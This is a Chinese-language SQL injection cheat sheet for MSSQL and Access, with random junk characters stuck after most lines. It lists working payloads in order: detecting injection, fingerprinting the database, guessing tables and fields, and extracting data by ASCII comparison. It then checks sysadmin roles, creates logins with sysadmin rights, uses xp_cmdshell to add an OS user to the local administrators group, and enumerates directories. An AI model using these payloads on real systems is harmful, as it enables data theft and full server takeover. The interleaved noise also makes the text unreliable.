1.判断是否有注入;and 1=1 ;and 1=2 "Z=5gj
2.初步判断是否是mssql ;and user>0 LOy0hN-$b
l^MzN
3.注入参数是字符'and [查询条件] and ''=' }J:+{4Yn
4LH[4Yj?`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' cD|Htt"
b</9Ai=
5.判断数据库系统 Vr[czfROz'
"es?=
;and (select count(*) from sysobjects)>0 mssql cvd\/pG)
-_C#wtC
;and (select count(*) from msysobjects)>0 access SMH<'F7i
8T)&`dM6P~
~@ jY[_
uw(NG.4
6.猜数据库 ;and (select Count(*) from [数据库名])>0 -s|8<A||"
B~
S6R
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Cqii}
j^tW
Iz
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 C)'q
QvA
{--0z3n>
9.(1)猜字段的ascii值(access) Z/;Xl~
Ian[LbCWB
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 yXI >I
'y]\-T
(2)猜字段的ascii值(mssql) bHLT}x/Gw
EtbnE*S
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F!zP<A"
t\P<X^d%
10.测试权限结构(mssql) 05yZad*
@fv}G>t
c~QS9)=E
0:0NXVYs&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- goat<\a
3>E%e!D%
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [/s&K{+c
wNFz*|n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- e:H26 SW
J^R=dT!
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- nOx4<Wk&
4P^6oh0"
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- F
H ]4Hj
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- X\EVTd)@
Y!iZW
;and 1=(select IS_MEMBER('db_owner'));-- HbP!KVHyk1
_@S`5;4x
kmzH'wktt
V%$/#sza
11.添加mssql和系统的帐户 ,h"-
F}Vr:~
;exec master.dbo.sp_addlogin username;-- "ju6XdZo
;exec master.dbo.sp_password null,username,password;-- 4_Dp+^JF
[Nn`l,
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- g&/T*L
{uzf"%VtP
;exec master.dbo.xp_cmdshell 'net user username password U9b?i$
=UyLk-P
w
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- {( r6e
D %Xo&V[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- )K &(
eX@L3BKp
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- y;/VB,4V
#o1=:PQaC
H":oNpfb
(#+^&1
12.(1)遍历目录 6@DF
}&_/PA0j
;create table dirs(paths varchar(100), id int) mI 74x3 [
6{=\7AY
;insert dirs exec master.dbo.xp_dirtree 'c:\' d!eYqM7-G
m2AnXY\
;and (select top 1 paths from dirs)>0 pK0"%eA
*z@>!8?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]U"94S U:)
oJN#C%r7
5\z`-)
<[w=TdCPs
(2)遍历目录 ]+X@
7
6Ybg^0m
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (o`{uj{!
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;*MLRXq
eM8}X[
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 c/sC&i;%O
3Z1CWzq(
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &jmRA